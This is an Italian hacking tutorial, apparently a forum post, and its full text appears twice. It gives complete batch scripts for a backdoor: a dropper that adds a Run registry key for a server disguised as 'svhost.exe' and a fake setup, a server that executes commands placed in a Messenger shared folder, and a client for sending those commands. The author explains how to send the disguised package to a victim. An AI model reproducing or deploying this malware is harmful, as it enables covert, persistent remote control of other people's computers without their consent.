Innanzitutto bisogna creare i file batch (2 da inviare alla vittima in un archivio autoestraente)!
Eccoli qui:
Lancia.exe (lanciato dall'archivio autoestraente)
CODICE
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svchost_key /t REG_SZ /d %*systemroot%\system32\svhost.exe /f
start svhost.exe
start setup.exe
del lancia.exe
svhost.exe (che funzionerà da server)
CODICE
CD "% userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\"emailVITTIMA"\Sharing Folders\"emailATTACKER"
:1
IF EXIST comandi.xcom (goto 3) else (goto 2)
:2
ping 127.0.0.1 -n 5 -w 1000
goto 1
:3
MOVE /Y comandi.xcom % systemroot%\system32\comandi.bat
start % systemroot%\system32\comandi.bat
GOTO 1
EXIT
(E il 3° file che funzionerà da client dal quale lanceremo i comandi sul Pc vittima):
CODICE
@Echo off
:1
ECHO Inserire utente a cui inviare i comandi
set /P x=
ECHO Digitare i comandi e poi premere ctrl+z quando si ha finito.
COPY con comandi.xcom
MOVE comandi.xcom "C:\Documents and settings\Impostazioni locali\Dati applicazioni\Microsoft\Messenger\"nostraemail"\Sharing Folders\% X%"
goto 1
(poi un eventuale setup chiamato "setup.exe" per mascherare il tutto)!
Poi bisogna creare la cartella condivisa con la vittima e modificare i file Batch con il percorso esatto della cartella Condivisa!
Io consiglio di compilare il server e il file lancia.exe con Quick Batch File Compiler in modalità Ghost!
Poi bisogna inviare l'archivio autoestraente alla vittima!
Quando lo aprirà verrà lanciato il file lancia.exe che aggiungerà il server al registro di sistema x farlo eseguire ad ogni avvio del sistema e poi lancerà il server!
Infine basta aprire il client sul nostro computer inserire l'email della vittima alla quale vogliamo inviare i comandi e poi scrivere i comandi da inviare alla vittima e poi ctrl+z alla fine!
Vediamo adesso chi sottovaluta i file Batch!!!
fonte:
LordHackRoss Site
Eccoli qui:
Lancia.exe (lanciato dall'archivio autoestraente)
CODICE
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svchost_key /t REG_SZ /d %*systemroot%\system32\svhost.exe /f
start svhost.exe
start setup.exe
del lancia.exe
svhost.exe (che funzionerà da server)
CODICE
CD "% userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\"emailVITTIMA"\Sharing Folders\"emailATTACKER"
:1
IF EXIST comandi.xcom (goto 3) else (goto 2)
:2
ping 127.0.0.1 -n 5 -w 1000
goto 1
:3
MOVE /Y comandi.xcom % systemroot%\system32\comandi.bat
start % systemroot%\system32\comandi.bat
GOTO 1
EXIT
(E il 3° file che funzionerà da client dal quale lanceremo i comandi sul Pc vittima):
CODICE
@Echo off
:1
ECHO Inserire utente a cui inviare i comandi
set /P x=
ECHO Digitare i comandi e poi premere ctrl+z quando si ha finito.
COPY con comandi.xcom
MOVE comandi.xcom "C:\Documents and settings\Impostazioni locali\Dati applicazioni\Microsoft\Messenger\"nostraemail"\Sharing Folders\% X%"
goto 1
(poi un eventuale setup chiamato "setup.exe" per mascherare il tutto)!
Poi bisogna creare la cartella condivisa con la vittima e modificare i file Batch con il percorso esatto della cartella Condivisa!
Io consiglio di compilare il server e il file lancia.exe con Quick Batch File Compiler in modalità Ghost!
Poi bisogna inviare l'archivio autoestraente alla vittima!
Quando lo aprirà verrà lanciato il file lancia.exe che aggiungerà il server al registro di sistema x farlo eseguire ad ogni avvio del sistema e poi lancerà il server!
Infine basta aprire il client sul nostro computer inserire l'email della vittima alla quale vogliamo inviare i comandi e poi scrivere i comandi da inviare alla vittima e poi ctrl+z alla fine!
Vediamo adesso chi sottovaluta i file Batch!!!
fonte:
LordHackRoss Site
Ultima modifica: